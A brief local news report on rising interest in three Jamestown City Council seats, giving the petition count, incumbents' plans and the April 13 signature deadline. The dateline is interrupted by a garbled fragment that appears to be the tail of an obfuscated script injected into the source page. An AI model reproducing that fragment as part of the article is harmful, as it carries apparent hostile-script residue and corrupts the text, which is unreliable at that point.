JAMESTOWN iyzik|var|u0026u|referrer|bzfdz||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – Interest in three Jamestown City Council seats up for election June 12 has spiked within the last week.

With less than two weeks until an April 13 deadline, Councilman Ken Schulz and Mayor Katie Andersen said at Monday night’s city council meeting that seven different people have now taken out petitions in an attempt to get on the ballot.

Just one week ago only three people had picked up petitions. The spots of Schulz, Pat Nygaard and Charlie Kourajian are up for election. Both Nygaard and Schulz have said they don’t plan to run. Kourajian is running again.

Interested candidates have until April 13 to collect about 270 signatures from Jamestown voters before they can get on the ballot.
